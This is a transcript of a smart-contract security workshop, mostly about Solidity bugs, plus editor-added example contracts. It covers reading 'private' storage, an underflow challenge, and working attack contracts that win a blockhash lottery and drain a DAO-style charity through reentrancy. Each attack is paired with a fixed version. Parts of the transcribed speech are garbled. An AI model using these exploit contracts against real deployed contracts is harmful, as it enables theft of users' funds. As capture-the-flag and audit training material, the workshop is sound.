Hi everyone, this is the smart contract security workshop. There are more of us here, but I'm Shayan, and this is Dean and John. We are part of ConsenSys Diligence; we do smart contract security and code auditing. If you need any security consultation, or you want to work on dApps, we are here to help: you can go to our website for audits and more, and also meet the MythX team, which is a smart contract security service. It's a set of tools you can run to see if your code has common mistakes or not.

So the agenda is: we do this quick intro, we go through a high-level introduction to Ethereum just to make sure we are on the same page, then we go through some of the tools we have in Remix, some of the ones you can start playing around with Ethereum with, and more details on how Ethereum works, how the storage works. We demo a few tools which make it easier for you to actually get through these challenges, and also some of the capture-the-flags, or CTFs. And we have a few challenges at the end that we try to hack together. We were hoping to have a two-hour workshop, if the desks had proper setups, so we are going to cram everything into one hour and probably do more interacting than hands-on.

So what is the familiarity of the group here? Has everybody written a smart contract at some point? More or less? Do you feel like you understand what the state looks like, and logs and opcodes and things like that? Okay, I'll go super fast; it will take five minutes. Great. But it's good to review, and somebody probably didn't want to admit that they don't know all these things.

So Ethereum, what is Ethereum? Ethereum is all of these accounts, and they have these four properties: every single account has a nonce, a balance, maybe code, and maybe storage.
So the state is made up of this great big list of accounts. There are contract accounts and external accounts. External accounts don't have code and don't have storage. There are opcodes; they do things in the VM. There you go.

Okay, so this is useful to be reminded of, even if you're familiar with this stuff, in the context of security: there are these two types of transactions. You can just send ether from one externally owned account (EOA) to another, or you can send it to a contract. Magic happens when you send ether to a contract, when you send this transaction: the contract can do any number of internal transactions, message calls as they're sometimes called. This creates a state transition. Contracts can call each other. And it gets worse, right? I heard recently that the average call depth on mainnet is getting deeper all the time, and contracts are increasing in composability. Someone stopped saying interoperability (Eth 2.0 took interoperability away) and is now saying composability; I just figured that out. So this composability is creating a lot more complexity. Things are happening a lot more deeply in the call stack, and that may have interesting implications. Can everybody hear me at the back, or do I need to project more? Okay.

Gas. I mean, there's gas; I think you all know what gas is. But the block gas limit, that's really important. Actually, who here subscribes to my newsletter, Maurelian's smart contract security newsletter? So I can't stop talking about it; I want to do a newsletter. It's not about gas, but gas is the most interesting thing to me right now. So the block gas limit: that can get you in a lot of trouble if you run out of all the possible gas that any miner will ever give you. And then if your opcodes just change in price and you were counting on them not doing that. Sorry. There's a table of opcodes with gas prices; I made these slides.
Okay, next: blocks. There are a few things there, for example around the gas price. If you increase the gas price even by one wei, miners would mine that one and prioritize it over the other one. So you can front-run, or get ahead of the other transaction, by just increasing the gas price by one wei. Or the fact that the block size is limited: because blocks are limited, they are scarce, so you can do some crypto-economic plays, or some attacks based on that. That was just an overview of all those things. Front-running: if you want to talk front-running, go deep on that, talk to Shayan; he's really interested in it. And there's a lightning talk tomorrow at four, if I'm not too late, about the front-running taxonomy.

So I'll take over. All right. As I said, this was supposed to be a more hands-on workshop, and I'm going to be hands-on. You can also follow along if you are interested: you can go to this link; it's also on the whiteboard. If you go to this link, you're going to see this gist here. It's about the challenges. You can click on challenge one and see a challenge here. Before the challenges, I just want to make sure we are on the same level. This is Solidity. I guess everyone here is familiar with Solidity source code. It doesn't do anything special here: you just have a variable named owner, and when you say hi, it puts the name in the name and returns "hi, name". So nothing really special here.

So there are a few things I want you to know. One is this slide: that things are public. If you go to Ropsten, Etherscan Ropsten, you can see all the information on the blockchain and what is happening. So let's say you want to store a value. I'm getting ahead of myself; I'm going to the end here.
So if you want to store a value on a blockchain: don't ever store secrets or anything like that. You might know that, but you might not know how it works and what that means. So in smart contracts, the storage starts here; it's called slot zero. So how can you see that? You can actually see where the storage is stored. You can go here and you can see the storage. You can also see the constructor that was used, so you can actually read the data that was passed to the contract through the transaction data. Etherscan has that too, but there is this data here as well.

So I'm working on this other tool called Legions. It's still early; I'll send a link on Twitter later on. But this is something to be able to easily poke around nodes and smart contracts. So in this case, I just want to show you what this contract might have. So let's say this smart contract; I just copy the address and run this tool. This tool has a nice interface and shows all the information that there is. In this case, what we need is to connect to a node. Connect to a node, which is now a user option: you can use your own node or connect to any node. By default it's connected to mainnet; here it's connected to a testnet, just to be able to query things. So it gives you a bunch of options. You can check this tool out later; it's not important here. I just want to show you how to read the storage. In this case, when you do query, you can read the balance, the details of a block, the code of a smart contract, do some cryptography things, and even read storage. So in this case I want to read the storage of this address that I just copied. Imagine that you have a secret in that smart contract. When I click, it queries the first 10 storage slots. This is what smart contracts actually store, the raw hex values, but this tool also tries to cast them to a string.
So it reads the first 10 storage slots, and you can see that even though that storage should not be visible from outside (I mean, based on traditional software development), it is. So we can read "hello there" from here. There are other tools you can use. This tool, as I said, is not necessarily part of this workshop, but go play around with it. If you want to add a function or feature to it, that would be perfect. And as I said, it has this whole interface on the command line, a nice interface there.

So, getting back to where we were. Yeah, if you go to this link, kick.to, you're going to go through a bunch of challenges. One is this challenge. Challenge one, if you look, is really simple. It has a balance; it has like 10 tokens you can buy, and whatever you pass to it, it adds to your balance; and burn, whatever you specify, it's going to burn. Do you see any way to have an infinite balance here? Very easy. It will underflow. Yeah, exactly. Do you want to do the rest now? No. Do you want to showcase the tool next? They'll showcase how easy it is. Next one. So you basically did what a code auditor does: finds the bug, goes through the code, finds what it is. There are some tools we mentioned that make it easier to actually find these common bugs. There you go, challenge one.

So yeah, people here use Remix? Anyone? Remix? Remix is great. One of the great things we've been working on lately is this MythX platform, which is a security-as-a-service tool: you throw smart contracts at it and it throws a bunch of bugs back at you. So it's pretty great. Another awesome thing is that it's built right into Remix. So if you go to the plugins thing, MythX shows up; you hit that activate button. And as it turns out, if you load in challenge one while you do the Remix thing, you hit the Analyze button. What was it? The screenshot is already set up. It's all on the right track.
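Added example from the editor, not code from the workshop's gist or from the Legions tool: the "hello there" read above works because every storage slot is public, and the layout rules decide where each value lands. This contract (all names, values and the slot arithmetic are this example's own) reads its own slots with SLOAD so the rules can be checked; a node's eth_getStorageAt on the same address returns exactly the same words.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.7.0;

// Added example: "private" only restricts Solidity-level access. Every slot is
// readable from any node with eth_getStorageAt (which is what the storage query
// in the demonstrated tool does); here the same slots are read in-contract with
// SLOAD so the layout can be verified. Fields and values are constructed.
contract StorageIsPublic {
    address private owner;                        // slot 0, right-aligned in 32 bytes
    bytes32 private secret = "hello there";       // slot 1, raw bytes, nothing hashed
    mapping(address => uint256) private balances; // slot 2 itself stays empty; entries
                                                  // live at keccak256(pad32(key) . 2)

    constructor() {
        owner = msg.sender;
        balances[msg.sender] = 42;
    }

    // Raw read of an arbitrary slot of this contract: the same word a node
    // returns for eth_getStorageAt(address, slot).
    function readSlot(uint256 slot) public view returns (bytes32 value) {
        assembly { value := sload(slot) }
    }

    // Slot of a mapping entry: keccak256(abi.encode(key, declarationSlot)).
    // abi.encode pads the address key to 32 bytes, as the layout rules require.
    function balanceSlot(address key) public pure returns (uint256) {
        return uint256(keccak256(abi.encode(key, uint256(2))));
    }

    // Every "private" value is recoverable from the slot alone: the owner from
    // slot 0, the secret verbatim from slot 1, a balance from its hashed slot.
    function layoutHolds() external view returns (bool) {
        return readSlot(0) == bytes32(uint256(uint160(owner)))
            && readSlot(1) == secret
            && readSlot(balanceSlot(owner)) == bytes32(uint256(42));
    }
}
```

Deploy it on a testnet and `layoutHolds()` returns true; querying slots 0 and 1 of the deployed address with any node (or with the tool shown in the talk) gives the owner and the ASCII of "hello there" without calling the contract at all. Caveat for longer values: a `string`/`bytes` field of 32 bytes or more stores only `2*length + 1` in its declared slot and the data starting at `keccak256(slot)`, so a reader has to follow that indirection, but the data is just as public.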
Anyway, so yeah, you hit the Analyze button and it spits out the issues at the bottom. You click on the issues and it actually goes to the line of code. So super convenient, super neat. A good way to cheat on workshops and everything. Yeah, very cool. Also, if you create an account on mythx.io, you'll have persistent results. If you just do the scan with Remix, it does it with kind of a sample address, and it goes away when you refresh. But if you create your own account, you can set up the plugin with your credentials, and that's kind of nice. Also, if you want to pay money, there's a premium service. You don't have to pay, but if you do, you get much deeper scans. Like if you have large contracts, it'll actually spend a long time on symbolic execution; it goes a lot deeper, which is great. So do that. There are also these command-line tools, which are great: Sabre, if you like JavaScript, and MythX CLI, if you like Python; they both have Truffle integration. It's pretty good. There's other goodness as well; you can find it on the MythX site, or ask me and I can just send it to you right now.

Just to finish what Dean was saying: for this challenge, MythX is here when you install it from plugins, and you can just press Analyze; it actually looks for you and finds all the issues. So here it says it can overflow, even though for that one you'd be passing msg.value, so someone would have to send that much money to overflow, which is less realistic; but this one is the amount that is user input, so you can easily underflow, as you said, and do that. So that's the goal.
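Added example from the editor reconstructing the shape of challenge one (the workshop's gist is not reproduced here): a balance you can buy into and burn from, in the Solidity 0.7 line, whose arithmetic wraps silently, which is the bug. The two MythX findings mentioned above are reproduced in the vulnerable contract, and the fixed contract adds the missing check. Contract and function names, the price, and the demo driver are this example's own choices.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.7.0;

// Added example, not the workshop's challenge code. Solidity 0.7 is used on
// purpose: its integer arithmetic wraps, so the bug is silent. (From 0.8 the
// same code would revert, which is the compiler doing the missing check.)
contract BurnableVulnerable {
    mapping(address => uint256) public balances;
    uint256 public constant PRICE = 1 ether;

    // Also flagged by the analyzer: amount * PRICE can wrap, but exploiting it
    // needs a caller who attaches a msg.value matching the wrapped product,
    // which is the "less realistic" finding.
    function buy(uint256 amount) external payable {
        require(msg.value == amount * PRICE, "wrong payment");
        balances[msg.sender] += amount;
    }

    // The realistic bug: amount is pure user input. With a balance of 0,
    // burn(1) wraps to 2**256 - 1, an "infinite" balance.
    function burn(uint256 amount) external {
        balances[msg.sender] -= amount;
    }
}

contract BurnableFixed {
    mapping(address => uint256) public balances;
    uint256 public constant PRICE = 1 ether;

    function buy(uint256 amount) external payable {
        uint256 cost = amount * PRICE;
        require(amount == 0 || cost / amount == PRICE, "overflow"); // pre-0.8 overflow guard
        require(msg.value == cost, "wrong payment");
        balances[msg.sender] += amount;
    }

    function burn(uint256 amount) external {
        require(balances[msg.sender] >= amount, "insufficient balance"); // the missing check
        balances[msg.sender] -= amount;
    }
}

// Constructed driver: shows the wrap on the vulnerable contract and the revert on the fixed one.
contract UnderflowDemo {
    function vulnerableBalanceAfterBurn() external returns (uint256) {
        BurnableVulnerable t = new BurnableVulnerable();
        t.burn(1);                          // no balance, yet it succeeds
        return t.balances(address(this));   // 2**256 - 1
    }

    function fixedBurnReverts() external returns (bool reverted) {
        BurnableFixed t = new BurnableFixed();
        try t.burn(1) { reverted = false; } catch { reverted = true; }
    }
}
```

Running `UnderflowDemo` in Remix against a 0.7 compiler returns the maximum uint256 from the first function and true from the second; pointing the MythX plugin at `BurnableVulnerable` reports the same two arithmetic issues the talk shows for challenge one, with the `burn` finding being the one that matters.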
Alright, so we touched on these, but if gas runs out for any reason, your function call reverts and the whole state change doesn't happen anymore. And there are fallback functions, which will be invoked if you don't name any function or you name a function that doesn't exist. That has been there in some of the hacks, where the function does not exist and it runs the fallback function. We're going to introduce some other ones too.

So this is where I ran ahead of myself, so I won't talk about how storage works again; I already talked about Legions, and this is a link if you want to download it and look at it. I already showed that to you. But there is also this blog post from one of our colleagues. The link was long, so this is the best way to find it: if you google "understanding Ethereum smart contract storage" and click on the programtheblockchain.com result, that's a good blog. It goes through different patterns: how arrays are implemented, how different things are implemented. And if you have any questions there, just hit us up at the Diligence team; the author works there.

So the other challenge: we just talked about how to store, or rather how not to store, secrets right there in the smart contract. So, in the traditional way, the best way to store passwords is to hash them, right? You can hash a password in Solidity with keccak, so you just hash it, save the keccak, and use that. It seems like a good way, right? If anyone looks at the variable, they still cannot guess what the password is. But it really depends on how you store that. Everything on Ethereum is definitely public. So in this case, if you go to challenge 2 (is it big enough for you guys to see? Is that better?), yeah, this is simple. For people who have done this before, it might be too simple.
So this is just a contract that gets the password, saves the password, and later on you can guess the password and get the money out of there. In this case you might say that anyone sending a guess-password transaction, you can see the password in it. But even before that, you can just do the same thing we were doing before: go to Ropsten and just see the password there. That's as easy as it gets. So, the constructor: you can go there, and this is a transaction we did for another conference, but you can see the contract there. So that's the easiest way. You can also still use tools and read it in some other ways.

All right. So now I'm going to introduce randomness. Can you think of some applications that you might need randomness for? Games. Or, yeah, gambling, not so serious. A lot of the use and promotion of blockchain has been on these kinds of applications too. You don't see this that much these days, because you can't really get randomness. Early on, people started to use different aspects, different timestamps, for the randomness, but all those, people can guess, or they can just influence them. So people were like, all right, let's try to use some other things that are not known beforehand, like the block hash, or the hash of the block hash, or some other variation of that. So let's see if that works or not.

So we have this other challenge, which is basically this one. It's a lottery; it has one ether in there. You have to pass a number and put some value in there, because you have to pay for the lottery ticket. And this part is using the hash of the last block; you hash that and it turns into a number. And if your guess is the same as the number, it transfers you as much as you pay. So this seems to be a random number that you wouldn't know. But how would you guess this, or how would you win this lottery?
I would write a contract that does this calculation and then calls the lottery function with the right number. Yeah, exactly. So one key point here is that in order to attack this contract, you have to write a contract, deploy that contract, and use it to attack this contract. So you run your code in the same environment that this code is running in, at the same time. So here, in order to attack this, you have to write one...

Yeah, good question: do we actually have to write a separate smart contract? Since this is looking at the previous block, you could just look at what the lottery number would be and then send the transaction with a high gas price and basically get it into the next block. That's possible, but you're risking it, because there's a 15-second block, so if you miss that block you miss that money and have to send another transaction. You can try to get in, but it's a race. But there's a shortcut; this is much more elegant than a race to pull off. Yeah, there have been some other lotteries like that, and we've seen attacks where people send like a thousand transactions just to make sure they get in. But that means, if you miss one block... if it looked at the current block you'd have to brute-force this, but since it's the previous block there are both ways to do it. Yeah, but that's a race. No, you can't know the hash of the current block. Yeah, there's no hash of the current block at runtime. So that's why it's using the previous one.

So let's attack this together here. I'm cheating; I have it commented out over here. One thing is that you don't need to have the full contract here, you can just have the interface, but this is easier for us for now. And as I said, this was supposed to be something you solve, but I just solved it here. So what you have to do is... I already deployed this before, so we can check. There's the transaction.
There's this much ether. So what I've got to do is just deploy this transaction. I think I know why this was, because I have a function. One trick is to change this to a constructor so you don't have to deploy and then call the function again. So in this case you have to deploy this contract and call attack with the input of the target, which is the target's address, and you have to pass some value in there. What it does is it calls the target's lottery function, which is this function, with some value, which is msg.value (this value is how much money is attached to that), and with the number that this contract is calculating here as well. So if the number is the same it sends out the prize. One easy way to make it a more ethical hack: you get the money back and clear out the contract. So here we just compiled; we used Injected Web3, so we're using MetaMask here, just making sure I'm not attacking mainnet. Yeah.

And we have this msg.sender, so let's write it out. I'm going to do the analysis. Is constructor in 0.5? In 0.4? Didn't the constructor keyword come out in 0.5, not 0.4? Yeah, it's in 0.4 as well. Should we just go with 0.5? There's a 0.5.1. Yeah, alright.

So the address was this address we were attacking before; some transactions got us confused, we passed this address all the time. Didn't you forget to fund it? Sorry? Fund it? No, here it's msg.sender, so it's going to send it back to... who's calling? Oh, in fact, that's the problem: sorry, I called it target. OK, so it should be fine. OK, something's wrong. Failed. Oh, you're right, I didn't send any value in there. Yes.
Alright, let's try this again. The problem was that this contract expects us to send some money with the call, and we didn't have any money attached to this transaction, so that's why it failed. So we're sending another transaction now. As you can see, we transferred one wei to this address and it sent us 1337 back, but it's not showing it properly. So we won the lottery and self-destructed after that. To see it better, maybe this is the way: in the internal transactions you can see it sent one wei, got this much back, sent it to the msg.sender, and self-destructed.

So one of the main points of this was to say that you can attack a contract with another contract, to get the same environment: same code, same environment, same variables; everything that the contract has access to is there. Any questions or comments about this? The debugging was fine.

Alright, so this is a similar example in the sense that you need a contract to attack the contract, but it goes back to the DAO story. I hope everyone here knows about the DAO, and what we've learned from the DAO: that smart contracts are hard, so just don't put that much money in them. The DAO is where Ethereum Classic came from; do you know the relation between Classic and the DAO? It started from there, and we still see the same attack. So there are attack patterns. I'm going slower here because I think I'm going slow... but yeah, are we going too fast? No. Is it too slow?
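Added example from the editor, not the workshop's gist: the lottery attack just demonstrated, written out in full. The `Lottery` contract is an assumed reconstruction of the challenge (a paid guess compared against a number derived from the previous block's hash, with the whole pot as the prize); the attacker is the constructor trick mentioned above, so deploy-and-attack is a single transaction and the prize goes back to the deployer through selfdestruct. Names and the prize rule are this example's assumptions.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.7.0;

// Added example. Lottery is an assumed reconstruction of the challenge target.
contract Lottery {
    constructor() payable {}                       // funded with the prize at deployment

    function winningNumber() internal view returns (uint256) {
        // "Random" to a human, but fully determined once the previous block exists,
        // and readable by any contract executing in the current block.
        return uint256(keccak256(abi.encodePacked(blockhash(block.number - 1))));
    }

    function play(uint256 guess) external payable {
        require(msg.value > 0, "buy a ticket");
        if (guess == winningNumber()) {
            // Assumption: the winner takes the whole pot. transfer() forwards only
            // 2300 gas, which is enough because the attacker below has no code yet.
            msg.sender.transfer(address(this).balance);
        }
    }
}

contract LotteryAttack {
    // Everything happens in the constructor, so deployment is the attack:
    // msg.value is the ticket, and the deployer gets the pot back via selfdestruct.
    constructor(address target) payable {
        // Same expression, same transaction, same block as the victim: guaranteed match.
        uint256 number = uint256(keccak256(abi.encodePacked(blockhash(block.number - 1))));
        Lottery(target).play{value: msg.value}(number);
        // While the constructor runs this address has no code, so the victim's
        // transfer() above is a plain value transfer that cannot run out of gas.
        selfdestruct(msg.sender);
    }
}
```

Deploy `Lottery` with one ether, then deploy `LotteryAttack` with the lottery's address and one wei attached; the deployment transaction shows the internal transfer of the pot to the attacker and the selfdestruct sending it on to the deployer, which is the trace the talk shows on the explorer. The same-transaction trick is why no race with other players is needed: the attacker never has to predict anything, it just reads the value the victim is about to read.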
Okay, we might need more time. So yeah, the DAO attack. The main issue was these two lines of code that should have been the other way around. Here you can see: someone can call withdraw; it checks that the balance is fine, it sends the value to the caller, and then it reduces the balance of the caller by that value. This was the pattern. So something was wrong here. What was wrong was that the attacker can be a contract that is the balance holder, and the balance holder can call withdraw. And this is the fallback function we were talking about: it calls withdraw again. So how the attack works is that the attacker calls this attack function, which calls the victim's function (the DAO) to withdraw one unit of token; the victim checks the balance, sees the balance is fine, and sends one wei, or one token, to the attacker. And we said the fallback function gets executed when no other function matches, so it calls this fallback, which runs withdraw again, and this goes back and forth and drains the contract. So would you say this attack goes on forever? Why is that?
Because there is no stop condition. Yeah, exactly. You run out of gas here. So if you can just do a few loops, that's good; you can do a few loops here before it runs out of gas. Yeah, maybe you hit the stack limit first. Yeah, exactly. So there are a few checks you can do here. One is this gasleft call, how much gas is left, but you have to do a lot of math there to see if you should do another call or not. Another way is to check the balance: if this balance here is how much is left. You have to have an exit condition there, because you can't really run it forever; it doesn't stop by itself, and if it runs out of gas the whole thing reverts, so you lose all the balances you took. So as we said, at the end it was $180 million or something like that, but these two lines should have been the other way around. That's what makes security really hard, because it seems fine, but it should be the other way around. There is a pattern that says checks-effects-interactions: you do the checks, then the effects, and then the interactions.

So for this you're going to try to do a reentrancy attack and steal money from this charity (this is just for education). The contract we have here is pretty simple. It has a mapping; this is a really common pattern in all the token contracts; we have this mapping of balances that holds the balances. There is an event, which doesn't really matter; a constructor that requires there to be one ether in there and adds that one ether to the msg.sender's balance. Anyone can donate, it's payable; anyone can donate to their own balance: they donate to the charity, they get the balance. You can check your balance, and you can withdraw. As you can see it's using the same pattern as the DAO: it checks the balance, it sends the funds out, and if that succeeds (this is a newer syntax that was added in Solidity), it just emits an event and reduces the balance. So you want to attack this. I want to make it
as interactive as possible, but I don't know exactly how, so I'm going to show you the solution. Let's try to write it together, or let's try this: what would be the stop condition here, if you want to do a reentrancy attack? What stops you from doing this loop of draining the contract?

The total balance of the contract is smaller than my balance in the contract. So you want to get more than half of the balance? If nothing is left, if my call will fail because the contract runs out of balance, then I stop. I mean, so you're just checking your balance? Yes: if the balance in the mapping on my address is bigger than the total balance of the contract. Yeah. So I'm going to upload that. It just means, like, a key of 1 and the total balance is 100... or if it has like 0.5 left you don't want to try it with 1; you don't want to be that bad; you can actually catch that in code here. So this is basically the equivalent of using Stack Overflow or anything like this: you can copy the code and try to make it work; that always works. Yeah, exactly.

So here, exactly, the attack: we are using the constructor because it's easier here, but then you can call attack. So you have to donate first; you have to have a balance in that charity to be able to attack, because if not, when you call withdraw, it checks whether you have a balance in there or not. It's easy to do that fast. So in the constructor we pass the target address, which is the challenge; we need to have that in the same place, and then we donate the msg.value that's passed to this deployment. After that you have to call this attack. So I'm going to just deploy it and then walk through it with you. Challenge 4 is here; I'm just going to show you that there is a balance here; there is this one balance there. Alright, so I would say this challenge should fail, so it doesn't put any value here, so it doesn't matter; it looks like
anyway, here, call this again. Alright, so after this mines, what it does is it sends whatever we sent to the charity, and as you can see it created this contract and sent 10 wei to our charity. So in here we should see that we have the balance for that contract. If you want to check, there is also an easy way to check a lot of things here: you can use challenge 4, which is the charity; you have to load it at its address, and then you get access to all the functionality that's there. So now you can check the balance of this one contract, which is this one contract; you check the balance and it is 10, as you said, 10 wei.

Let's attack this and then we can experiment with it. So we go back here and look at the code; it's the same pattern we talked about. If you call attack, it's going to invoke withdraw with the total balance of that address, and the withdraw is going to call the fallback, and if the target has more than one ether, you try again. So I guess I'll send some ether to that address first; it needs more than one ether; I'm just going to send one ether to this address. So let's try this, because at the end we're going to try MythX and see if it can find this. There is no input, because we already passed the contract as the target. So, attack. One mistake I made is that I didn't send it to the proper address a minute ago. Anyway, I guess you got the whole point. I'm not sure if I have to debug this now, but if the attack is successful, it should look something like this. This is the right contract, because this is the transaction we sent out and internally it tried to send... I really confused myself here trying to do something cool, sorry. Should we look at both, in the sense of the gas and the balance? So here there is an arbitrary
check: it just checks that the target balance has more than one ether, and the problem here is that it sends less than the money that's left, so it has to run multiple transactions. If I had sent 0.1 ether, it would be much easier to attack right now, but in general it's on the safe side, because we can combine two different conditions. So if you want to do that, you can add this check: I think you can do gasleft less than 2300, 2300 being the stipend for a transfer, and if there is less gas left then just return, don't continue. Something like this would work as well. But what we are excited to do is to see how MythX would find this, and we can just run it on the original one. So this is the time when the contract is vulnerable, so we can run MythX here: Challenge 4, Analyze. Are you logged in? I'll get you an account. While this runs (it's at about 90%): what questions do people have about security? What anxieties do people have about writing smart contracts? For security experts, what could you really get out of this in a few minutes, if you could ask me some questions?

Does anybody... have you deployed contracts to mainnet, in like Truffle? How did that feel? Scary as hell. Quite easy. I had my gas price high, so it was super fast, it took like 3 seconds or something, and it cost me $200. Right, $200 to minimize the time. Oh yeah, it was better than... and this is Chris from Maker. Yeah, this is the first... I had personally never deployed anything of consequence to mainnet, like my own stuff, but I've never deployed anything that matters a lot, so I don't care about that. Anybody else? I deployed once. I tried to use the estimate, it wasn't working, and then I used half of... half of anything, and then I just mixed it up and it's 0.01. Huh. Gas
calculation is hard. Has anybody ever had a contract hacked, or lost money in some, you know, of the many ways that you can lose money in this world? I have. I have too. Nobody? John, when do you know you're ready? Once we've audited your code. I think once you have done all you can, right, there's a point of diminishing returns when there's just nothing else. Like a blog post: you read it and you can't do anything, you can't even see your own typos, so you get somebody else to do it. That's us. You're prepared, you're well prepared. I have a blog post about how to prepare for a smart contract audit; I'll tweet that. But yeah, there are a lot of things you can do to not get a very good result from an audit, like just dropping some code with no documentation on us. Or you can do your work internally up front to be really ready for it, come to us well in advance; maybe we decide the best thing to do is to work with you for a few days, just to say hey, fix this, fix this, delete this, and then you get a better audit, and we're able to focus just on going deeper. And I think being well prepared for an audit can make it more affordable and effective for most people. And I think most smaller teams that aren't like Maker can afford to write documentation if you're willing to take the time to do it. Usually, if you write good documentation or specs for your code: sure, you just hacked out the code, maybe you wrote tests first, in which case you're doing great, ahead of the curve; but then if you sit down and try to communicate in prose, in plain English, to someone else what your code does, you have to read it. I guarantee you'll find something; you'll be like, wait, does it actually do that thing when this happens? And you'll read it again and be like, oh no, it actually does something I did not think it does. That's a
great thing to do; I highly recommend it. Yeah, writing inline comments and documentation, and overall what this app should do, explaining it; you can see the line of code and the comment: is it doing what I'm saying it should do? That helps a lot. You don't need to have graphs and charts like that.

So actually, we have a free and a pro version, and we're limited to the premium version here, so I'm going to show you that on my machine. Basically the result you get is these two things, and they are both relevant for this attack. Whenever you make a low-level call, like here, to another contract, the EVM gives all the gas that is still left to execute the other contract's code, and if you do that then you should never change the world state after you did it, because the contract trusts that this change will happen, but the other contract can re-enter that contract. So that's the thing we warn about: effects. And if you move this line up here, above the call, then the issue is fixed, and the balance will be deducted the first time already, and it won't matter if you re-enter it. So that's checks-effects-interactions, right?

One thing I just wanted to show: do you have the challenge here? I just think there's a README file. I'm not going to show the last slide again, but there is this best-practices document that is open source; a lot of contributions have been made; please read that; there are a lot of good things there, and if you see any mistakes, send them in. This is Capture the Ether; some of the challenges were based on that. You can just play around, do CTF-style things and hack contracts; it's really fun. This is how you can find us on Twitter, and also if you're interested in auditing, either as a client or for reading the audit reports, you can find all our blog posts and audit reports that are public there. It's really interesting to see the bugs that were found and how they were fixed. And I guess we have like two-ish minutes left, so thank you for being
here, and our cards are at the back. Thanks.
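Added example from the editor, not the workshop's gist: the charity of challenge 4, its reentrancy drain, and the checks-effects-interactions fix that the MythX result points at, written out as one compilable unit. `CharityVulnerable` is a reconstruction of the pattern described in the talk (check, call, then balance update); `Drain` uses the constructor-donate trick and the two stop conditions the audience and speakers settled on (the victim can still pay a full round, and enough gas remains); `CharityFixed` is the same contract with the two lines the other way around. Solidity 0.7 is used so that the unwinding `balances -= amount` wraps as in the 0.5-era original instead of reverting. Names and the gas margin are this example's assumptions.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.7.0;

// Added example: the DAO pattern as described in the talk (interaction before effect).
contract CharityVulnerable {
    mapping(address => uint256) public balances;
    event Withdrawal(address indexed who, uint256 amount);

    function donate() external payable { balances[msg.sender] += msg.value; }

    function withdraw(uint256 amount) external {
        require(balances[msg.sender] >= amount, "insufficient");   // check
        (bool ok, ) = msg.sender.call{value: amount}("");           // interaction: forwards all gas
        require(ok, "send failed");
        emit Withdrawal(msg.sender, amount);
        balances[msg.sender] -= amount;                             // effect, too late (wraps in 0.7)
    }
}

// Checks-effects-interactions: the same contract with the two lines swapped.
contract CharityFixed {
    mapping(address => uint256) public balances;

    function donate() external payable { balances[msg.sender] += msg.value; }

    function withdraw(uint256 amount) external {
        require(balances[msg.sender] >= amount, "insufficient");   // check
        balances[msg.sender] -= amount;                             // effect
        (bool ok, ) = msg.sender.call{value: amount}("");           // interaction
        require(ok, "send failed");
    }
}

contract Drain {
    CharityVulnerable public immutable target;
    address payable public immutable owner;
    uint256 private constant GAS_MARGIN = 100000; // assumed margin for one more round; tune per victim

    // Donate at deployment so withdraw()'s balance check passes (0.7 cannot read
    // an immutable inside the constructor, hence the local cast).
    constructor(address payable charity) payable {
        target = CharityVulnerable(charity);
        owner = msg.sender;
        CharityVulnerable(charity).donate{value: msg.value}();
    }

    function attack() external { target.withdraw(target.balances(address(this))); }

    // Runs inside the victim's call{value:}, before it reduces our balance, so the
    // mapping still shows the full donation and withdraw() lets us in again.
    receive() external payable {
        uint256 mine = target.balances(address(this));
        // Stop conditions: re-enter only while the victim can still pay a full round
        // (a failing inner call would revert the whole chain and return everything),
        // and only while enough gas is left for one more round.
        if (address(target).balance >= mine && gasleft() > GAS_MARGIN) {
            target.withdraw(mine);
        }
    }

    function collect() external { owner.transfer(address(this).balance); }
}
```

Deploy `CharityVulnerable`, fund it by donating, then deploy `Drain` with a small donation and call `attack()`: the internal-transaction list shows one withdrawal per round until the victim's balance drops below the attacker's recorded balance, exactly the drain the talk walks through. Pointing the same `Drain` at `CharityFixed` reverts, because the re-entered `withdraw` now sees a balance of zero at the check. Two practical caveats: the balance condition is what actually terminates the loop, so choose the donation size relative to the pot (a donation far smaller than the pot means many rounds and more gas); and the EVM's 1024 call-depth limit also ends the recursion with a failing inner call, so a round counter is a third stop condition worth having in a real test.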